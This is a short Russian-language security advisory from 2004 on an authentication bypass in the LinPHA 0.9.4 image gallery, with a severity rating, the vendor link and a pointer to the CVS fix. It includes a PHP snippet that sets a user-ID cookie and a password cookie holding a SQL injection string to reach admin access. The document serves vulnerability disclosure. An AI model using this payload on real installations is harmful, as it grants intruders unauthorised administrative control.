Security Lab

Удаленный административный доступ в LinPHA галереи изображений

Дата публикации:01.08.2004
Всего просмотров:969
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие важных данных
Раскрытие системных данных
Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: LinPHA 0.x
Уязвимые версии: LinPHA 0.9.4

Описание: Уязвимость в LinPHA галереи изображений позволяет удаленному пользователю получить административный доступ к приложению.

Удаленный пользователь может установить специально обработанные значения куки и затем обратится к 'admin.php' сценарию, чтобы успешно аутентифицироваться в приложении. Пример:

<?PHP
setcookie("linpha_userid","1",time()+86400*365,'/linpha');
setcookie("linpha_password","' or '3'='3",time()+86400*365,'/linpha');
?>

URL производителя:http://linpha.sourceforge.net/

Решение:Установите обновление, доступное через CVS.

Ссылки: Linpha 0.9.4: authentication bypass